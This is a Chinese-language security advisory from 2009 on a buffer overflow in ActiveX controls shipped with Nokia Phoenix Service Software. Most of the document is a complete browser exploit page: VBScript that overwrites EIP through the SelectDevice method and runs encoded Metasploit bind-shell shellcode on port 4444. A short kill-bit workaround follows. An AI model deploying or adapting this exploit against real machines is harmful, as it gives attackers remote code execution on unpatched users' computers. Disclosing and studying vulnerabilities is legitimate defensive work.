发布日期：2009-02-10
更新日期：2009-02-11

受影响系统：

Nokia Phoenix Service Software 2008.04.007.32837

描述：

---

BUGTRAQ  ID: 33726

Nokia Phoenix Service Software是用于刷机诺基亚手机的软件。

Nokia Phoenix Service Software所提供的cmnsignalanalyzerfn.dll（{F85B4A10-B530-4D68-A714-7415838FD174}）和cmnsignalgeneratorfn.dll（{929A0D77-044A-497F-8FDF-8EDE81F6251A}）库没有正确地验证用户输入参数，如果用户受骗访问了恶意网页并向有漏洞的ActiveX控件传送了超长参数的话，就可以触发缓冲区溢出，导致在用户浏览器会话中执行任意代码。

<*来源：MurderSkillz （murderskill@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=123430097127418&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object>

<script language = 'vbscript'>

junk = String(370, "A")

EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7

nop = String(12, unescape("%90"))

<!-- win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com -->

shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")
shellcode=shellcode+unescape("%49%49%37%49%49%49%49%49%49%49%49%49%51%5a%6a%67")
shellcode=shellcode+unescape("%58%30%42%31%50%41%42%6b%42%41%77%32%42%42%32%41")
shellcode=shellcode+unescape("%41%30%41%41%42%58%38%42%42%50%75%6b%59%39%6c%50")
shellcode=shellcode+unescape("%6a%7a%4b%70%4d%6d%38%4b%49%6b%4f%59%6f%69%6f%31")
shellcode=shellcode+unescape("%70%4e%6b%72%4c%51%34%56%44%4e%6b%30%45%57%4c%4c")
shellcode=shellcode+unescape("%4b%33%4c%57%75%53%48%45%51%68%6f%6e%6b%32%6f%52")
shellcode=shellcode+unescape("%38%4e%6b%53%6f%61%30%45%51%5a%4b%42%69%4e%6b%56")
shellcode=shellcode+unescape("%54%4e%6b%47%71%78%6e%45%61%4b%70%6f%69%4c%6c%6d")
shellcode=shellcode+unescape("%54%6f%30%71%64%65%57%58%41%68%4a%76%6d%35%51%6b")
shellcode=shellcode+unescape("%72%78%6b%6c%34%75%6b%73%64%75%74%75%78%51%65%49")
shellcode=shellcode+unescape("%75%6e%6b%51%4f%36%44%57%71%5a%4b%70%66%6e%6b%34")
shellcode=shellcode+unescape("%4c%30%4b%6c%4b%73%6f%47%6c%65%51%4a%4b%73%33%64")
shellcode=shellcode+unescape("%6c%4e%6b%4b%39%70%6c%31%34%77%6c%75%31%69%53%65")
shellcode=shellcode+unescape("%61%49%4b%52%44%6e%6b%32%63%36%50%6e%6b%33%70%74")
shellcode=shellcode+unescape("%4c%6c%4b%74%30%45%4c%4c%6d%6e%6b%77%30%57%78%61")
shellcode=shellcode+unescape("%4e%73%58%6c%4e%50%4e%36%6e%38%6c%56%30%79%6f%38")
shellcode=shellcode+unescape("%56%55%36%72%73%65%36%30%68%44%73%34%72%65%38%42")
shellcode=shellcode+unescape("%57%53%43%77%42%61%4f%31%44%6b%4f%6e%30%45%38%4a")
shellcode=shellcode+unescape("%6b%48%6d%4b%4c%77%4b%46%30%69%6f%4a%76%61%4f%4b")
shellcode=shellcode+unescape("%39%6b%55%62%46%4b%31%48%6d%75%58%76%62%43%65%73")
shellcode=shellcode+unescape("%5a%35%52%6b%4f%4e%30%55%38%6e%39%65%59%6b%45%6e")
shellcode=shellcode+unescape("%4d%62%77%4b%4f%69%46%51%43%46%33%71%43%52%73%63")
shellcode=shellcode+unescape("%63%43%73%30%53%70%43%61%43%59%6f%6e%30%72%46%75")
shellcode=shellcode+unescape("%38%52%31%71%4c%33%56%43%63%6d%59%59%71%6c%55%72")
shellcode=shellcode+unescape("%48%6f%54%66%7a%70%70%4b%77%50%57%4b%4f%4b%66%63")
shellcode=shellcode+unescape("%5a%36%70%71%41%50%55%4b%4f%4e%30%61%78%4f%54%4c")
shellcode=shellcode+unescape("%6d%56%4e%69%79%52%77%6b%4f%5a%76%36%33%43%65%59")
shellcode=shellcode+unescape("%6f%5a%70%45%38%6a%45%30%49%6c%46%57%39%72%77%59")
shellcode=shellcode+unescape("%6f%7a%76%50%50%71%44%70%54%52%75%39%6f%58%50%6e")
shellcode=shellcode+unescape("%73%42%48%4b%57%71%69%38%46%33%49%41%47%39%6f%49")
shellcode=shellcode+unescape("%46%30%55%49%6f%4a%70%50%66%61%7a%31%74%43%56%52")
shellcode=shellcode+unescape("%48%75%33%62%4d%6c%49%49%75%71%7a%42%70%50%59%54")
shellcode=shellcode+unescape("%69%4a%6c%4c%49%39%77%42%4a%57%34%4b%39%69%72%65")
shellcode=shellcode+unescape("%61%4b%70%58%73%6d%7a%6b%4e%50%42%76%4d%6b%4e%50")
shellcode=shellcode+unescape("%42%76%4c%4d%43%6e%6d%73%4a%65%68%6e%4b%6e%4b%4c")
shellcode=shellcode+unescape("%6b%71%78%32%52%6b%4e%4f%43%34%56%69%6f%72%55%32")
shellcode=shellcode+unescape("%64%49%6f%7a%76%43%6b%56%37%56%32%70%51%30%51%32")
shellcode=shellcode+unescape("%71%43%5a%37%71%41%41%73%61%63%65%66%31%4b%4f%5a")
shellcode=shellcode+unescape("%70%70%68%6e%4d%79%49%73%35%5a%6e%61%43%49%6f%58")
shellcode=shellcode+unescape("%56%50%6a%49%6f%59%6f%64%77%59%6f%58%50%4c%4b%32")
shellcode=shellcode+unescape("%77%6b%4c%4e%63%48%44%63%54%6b%4f%4e%36%46%32%69")
shellcode=shellcode+unescape("%6f%38%50%51%78%78%70%4f%7a%76%64%31%4f%63%63%69")
shellcode=shellcode+unescape("%6f%4b%66%6b%4f%68%50%67")

NokiaFucker = junk + EIP + nop + shellcode

Fucker.SelectDevice NokiaFucker,""

</script>

</html>

建议：

---

临时解决方法：

* 为CLSID {F85B4A10-B530-4D68-A714-7415838FD174}和{929A0D77-044A-497F-8FDF-8EDE81F6251A}设置kill-bit。

厂商补丁：

Nokia
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nokia.com

浏览次数：2782
严重程度：0（网友投票）